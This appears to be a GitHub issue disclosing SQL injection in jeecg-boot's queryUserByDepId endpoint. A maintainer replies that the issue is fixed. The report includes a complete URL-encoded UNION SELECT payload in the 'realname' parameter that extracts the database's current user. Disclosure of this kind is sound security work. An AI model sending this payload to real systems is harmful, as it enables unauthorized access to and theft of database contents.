SQL injection exists in /jeecg-boot/sys/user/queryUserByDepId #3347
Comments
|
jl |
|
问题已修复,下版本发布 |
# for free
to join this conversation on GitHub.
Already have an account?
# to comment
{{ message }}
版本号:
<=3.0
问题描述:
After testing, it is found that the code parameter of /jeecg-boot/sys/user/queryUserByDepId interface of jeecg-boot has SQL injection
截图&代码:
payload:/jeecg-boot/sys/user/queryUserByDepId?_t=1641263644&id=57197590443c44f083d42ae24ef26a2c&realname=%64%61%73%64%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%63%6f%6e%63%61%74%28%30%78%37%2c%69%66%6e%75%6c%6c%28%63%61%73%74%28%63%75%72%72%65%6e%74%5f%75%73%65%72%28%29%20%61%73%20%6e%63%68%61%72%29%2c%30%78%32%30%29%2c%30%78%37%29%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2d%2d%20%2d
The vulnerability code exists in the following code:\jeecg-boot\jeecg-boot-module-system\src\main\java\org\jeecg\modules\system\controller\SysUserController.java At line 366 of
友情提示(为了提高issue处理效率):
The text was updated successfully, but these errors were encountered: